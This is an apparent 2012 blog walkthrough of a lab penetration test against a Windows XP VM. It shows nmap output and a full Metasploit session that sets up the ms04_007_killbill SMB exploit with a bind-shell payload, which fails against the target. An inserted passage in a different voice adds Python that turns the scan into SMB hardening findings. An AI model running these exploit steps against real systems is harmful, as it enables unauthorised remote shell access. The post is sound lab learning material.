Friday, 21 December 2012

IG, SE, VA and SMB Exploitation of Windows XP SP3 on VirtualBox from Backtrack 5


To perform a pentest there are several stages we have to go through.
First we have to do Information Gathering (IG) and Service Enumeration (SE).
Here we do IG and SE using the nmap tool.

Scanning with the nmap Tool
Type the command: # nmap -T4 -A -v 192.168.56.101

Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:8E:6C:39 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: 
|   NetBIOS name: XPSP3, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:8e:6c:39 (Cadmus Computer Systems)
|   Names
|     XPSP3<00>            Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     XPSP3<20>            Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: xpsp3
|   NetBIOS computer name: XPSP3
|   Workgroup: WORKGROUP
|_  System time: 2012-12-22 01:25:23 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.101

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
           Raw packets sent: 1106 (49.362KB) | Rcvd: 1017 (41.238KB)

Then we use Metasploit to test the vulnerability manually.
First we start the console from the shell: root@bt:~# msfconsole 192.168.56.101

     ,           ,                                                                                 
    /             \                                                                                
   ((__---,,,---__))                                                                               
      (_) O O (_)_________                                                                         
         \ _ /            |\                                                                       
          o_o \   M S F   | \                                                                      
               \   _____  |  *                                                                     
                |||   WW|||                                                                        
                |||     |||                                                                        
                                                                                                   

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15728 updated 134 days ago (2012.08.10)

Warning: This copy of the Metasploit Framework was last updated 134 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >
Then we search for SMB modules by typing the command
msf > search smb
Matching Modules
================

   Name                                                        Disclosure Date          Rank       Description
   ----                                                        ---------------          ----       -----------
   (module name not captured)                                                                      Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms04_007_killbill                       2004-02-10 00:00:00 UTC  low        Microsoft ASN.1 Library Bitstring Heap Overflow
   exploit/windows/smb/ms04_011_lsass                          2004-04-13 00:00:00 UTC  good       Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   exploit/windows/smb/ms04_031_netdde                         2004-10-12 00:00:00 UTC  good       Microsoft NetDDE Service Overflow
   exploit/windows/smb/ms05_039_pnp                            2005-08-09 00:00:00 UTC  good       Microsoft Plug and Play Service Overflow
   exploit/windows/smb/ms06_025_rasmans_reg                    2006-06-13 00:00:00 UTC  good       Microsoft RRAS Service RASMAN Registry Overflow
   exploit/windows/smb/ms06_025_rras                           2006-06-13 00:00:00 UTC  average    Microsoft RRAS Service Overflow
   exploit/windows/smb/ms06_040_netapi                         2006-08-08 00:00:00 UTC  good       Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_066_nwapi                          2006-11-14 00:00:00 UTC  good       Microsoft Services MS06-066 nwapi32.dll Module Exploit
   exploit/windows/smb/ms06_066_nwwks                          2006-11-14 00:00:00 UTC  good       Microsoft Services MS06-066 nwwks.dll Module Exploit
   exploit/windows/smb/ms06_070_wkssvc                         2006-11-14 00:00:00 UTC  manual     Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms07_029_msdns_zonename                 2007-04-12 00:00:00 UTC  manual     Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   exploit/windows/smb/ms08_067_netapi                         2008-10-28 00:00:00 UTC  great      Microsoft Server Service Relative Path Stack Corruption
   exploit/windows/smb/ms09_050_smb2_negotiate_func_index      2009-09-07 00:00:00 UTC  good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   exploit/windows/smb/ms10_061_spoolss                        2010-09-14 00:00:00 UTC  excellent  Microsoft Print Spooler Service Impersonation Vulnerability
   exploit/windows/smb/netidentity_xtierrpcpipe                2009-04-06 00:00:00 UTC  great      


Then select one of the SMB modules to use as the exploit. Type the command
msf > use exploit/windows/smb/ms04_007_killbill

Then type the command
msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf  exploit(ms04_007_killbill) > set RHOST 192.168.56.101
RHOST => 192.168.56.101


msf  exploit(ms04_007_killbill) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  192.168.56.101   yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.56.101   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf  exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0

msf  exploit(ms04_007_killbill) > exploit 

[*] Started bind handler
[-] Error: The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)
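The scan above fingerprints the host as Windows XP SP2 or SP3 (NetBIOS name XPSP3) with SMB message signing disabled, no SMBv2 support and the guest account accepted, while the module's only target is Windows 2000 SP2-SP4 + Windows XP SP0-SP1. The Python below is an added example, not code from the original post: it turns the nmap SMB host-script output into hardening findings and checks the module's stated target range against the fingerprint, the check that was skipped before running the exploit. The excerpts embedded in it are trimmed copies of the output shown above, and the function names are my own.

```python
import re

# Constructed excerpts: trimmed copies of the nmap and Metasploit output shown above.
NMAP_OUTPUT = """\
OS details: Microsoft Windows XP SP2 or SP3
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|_  Message signing disabled (dangerous, but default)
|   NetBIOS computer name: XPSP3
"""

MODULE_TARGETS = """\
Exploit target:
   Id  Name
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1
"""

def smb_findings(nmap_text):
    """Hardening findings a defender should raise from nmap's SMB host scripts."""
    findings = []
    if "Message signing disabled" in nmap_text:
        findings.append("SMB signing disabled: sessions can be relayed or tampered with")
    if "doesn't support SMBv2" in nmap_text:
        findings.append("SMBv1 only: legacy dialect without per-packet integrity")
    if re.search(r"Account that was used for smb scripts: guest", nmap_text):
        findings.append("Guest account accepted: OS and security mode readable without credentials")
    return findings

def detected_service_packs(nmap_text):
    """Candidate XP service packs from the 'OS details' line, e.g. {2, 3}."""
    m = re.search(r"OS details: .*Windows XP (SP\d(?: or SP\d)*)", nmap_text)
    return {int(sp[2:]) for sp in m.group(1).split(" or ")} if m else set()

def module_xp_service_packs(target_text):
    """Service packs covered by a module target such as 'Windows XP SP0-SP1'."""
    packs = set()
    for lo, hi in re.findall(r"Windows XP SP(\d)-SP(\d)", target_text):
        packs.update(range(int(lo), int(hi) + 1))
    return packs

def target_in_scope(nmap_text, target_text):
    """True only if every fingerprinted service pack is listed by the module."""
    detected = detected_service_packs(nmap_text)
    return bool(detected) and detected <= module_xp_service_packs(target_text)

if __name__ == "__main__":
    for finding in smb_findings(NMAP_OUTPUT):
        print("FINDING:", finding)
    print("module target covers this host:", target_in_scope(NMAP_OUTPUT, MODULE_TARGETS))
```

For this host the check returns False, which is consistent with the STATUS_INVALID_PARAMETER response above: the target is outside the module's supported service packs, so a mismatch rather than a handler problem is the first thing to rule out.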


Scanning With Nessus Tool


Then click the Launch Scan button.



Sorry, still getting an error; please help further :-)

1 comment:

  1. Hi, I'm using ms08_067_netapi
    here: http://scx030c067.blogspot.com/2012/12/exploit-ms08-067-in-windows-xp.html
